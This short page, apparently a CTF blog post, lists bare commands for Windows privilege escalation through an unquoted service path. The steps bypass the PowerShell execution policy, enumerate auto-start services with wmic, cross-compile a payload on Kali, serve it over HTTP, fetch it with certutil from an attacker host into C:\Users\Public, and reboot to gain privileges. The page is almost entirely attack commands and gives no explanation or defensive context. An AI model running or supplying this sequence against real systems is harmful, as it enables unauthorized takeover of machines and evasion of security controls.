1. Powershell.exe -ep bypass

2. Whoami

3. Net user hackerctf

4. Exit to cmd

5. wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\\” | findstr /i /v “””(optional)

6. Powershell.exe -ep bypass -c “$service = get-wmiobject -query ‘select * from win32_service’; echo $service.pathname”

7. Payload in kali using c and mingw to build

8. i686-w64-mingw32-gcc -o Open priv-win.c

9. python3 -m http.server 8000

10. cd C:\Users\Public

11. Certutil.exe -urlcache -split -f http://192.168.1.3:8000/Open.exe Open.exe

12. Shutdown /r /t 0

13. Net user hackerctf

14. Done

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp
Share on telegram
Telegram
Share on pinterest
Pinterest

Leave a Comment